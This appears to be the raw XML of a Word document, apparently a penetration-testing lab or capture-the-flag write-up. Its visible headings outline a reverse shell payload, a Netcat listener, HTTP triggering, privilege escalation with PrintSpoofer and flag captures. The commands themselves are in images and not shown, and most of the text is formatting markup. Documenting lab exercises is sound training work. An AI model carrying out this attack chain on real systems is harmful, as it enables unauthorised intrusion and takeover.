            <wp:extent cx="5267960" cy="2923540"/>
            <wp:effectExtent l="0" t="0" r="8890" b="10160"/>
            <wp:docPr id="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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267960" cy="2923540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E5F2D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.6 Finding host IP for reverse shell payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB6360">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D685836">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1600835"/>
            <wp:effectExtent l="0" t="0" r="6985" b="18415"/>
            <wp:docPr id="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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269865" cy="1600835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD966BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.6.1 Reverse shell payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C13C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1851660"/>
            <wp:effectExtent l="0" t="0" r="6350" b="15240"/>
            <wp:docPr id="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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="1851660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636ACC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.7 Netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A6355">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B66A332">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4867275" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4867275" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F16C0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.8 HTTP triggering of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0DFCD4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E9C3E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1851660"/>
            <wp:effectExtent l="0" t="0" r="6350" b="15240"/>
            <wp:docPr id="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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="1851660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EC702C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.9 Remote server access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C9802">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8B3CDE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1202055"/>
            <wp:effectExtent l="0" t="0" r="9525" b="17145"/>
            <wp:docPr id="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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="1202055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F23542C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5CCA3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.9.1 User.txt flag capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA3ED1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="3488055"/>
            <wp:effectExtent l="0" t="0" r="8255" b="17145"/>
            <wp:docPr id="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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5268595" cy="3488055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC6D50F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2230537F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726971AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.9.2 Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3778FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032A9C18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED3EDA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A8DAC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32436369">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5245100" cy="4690745"/>
            <wp:effectExtent l="0" t="0" r="12700" b="14605"/>
            <wp:docPr id="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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5245100" cy="4690745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1739AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.9.3 PrintSpoofer download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC96450">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A816E68">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C00EFFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673E96F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2738755"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271770" cy="2738755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A525DB2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.9.4 Root.txt flag capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2599DB55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512E82F5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631739D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1346835"/>
            <wp:effectExtent l="0" t="0" r="10160" b="5715"/>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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="1346835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="374BF6C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6CDC2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.9.5 Proof of Lab completion.</w:t>
      </w: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pperplate Gothic Bold">
    <w:panose1 w:val="020E07050202060204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D84EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEBD84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ED17425"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BED174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5C591D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5C591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2EC691D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2EC69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CD324FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECD324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DAED840"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDAED8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2826004"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F28260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705C722"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0705C7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5BC8EE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15BC8E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497A001"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2497A0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EF53EB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2EF53E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C0524C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C0524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D2D0292"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D2D02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0D7789F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50D77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159674E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="515967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52B9C655"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="52B9C655"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16">
    <w:nsid w:val="5EE6CC6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EE6CC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6C925FCA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C925F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6E588703"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E588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455481C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="745548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773B2844"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="773B2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15"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="1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9C388A"/>
    <w:rsid w:val="504F0C4F"/>
    <w:rsid w:val="60913754"/>
    <w:rsid w:val="69D17FBA"/>
    <w:rsid w:val="6A9C3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3649</Words>
  <Characters>21381</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>19</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>24572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2026-08-25T08:14:00Z</dcterms:created>
  <dc:creator>HP 840 G3</dc:creator>
  <cp:lastModifiedBy>WPS_1787645406</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-26T06:43:44Z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58994C92520546B19728DD67701C47DC_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNThiNTFiNjYyNDI4ZDBhNmViNDBmZDIwYmE5NzNlYmQiLCJ1c2VySWQiOiIxNDk4MDg1MTIxNDQyNSJ9</vt:lpwstr>
  </property>
</Properties>
</file>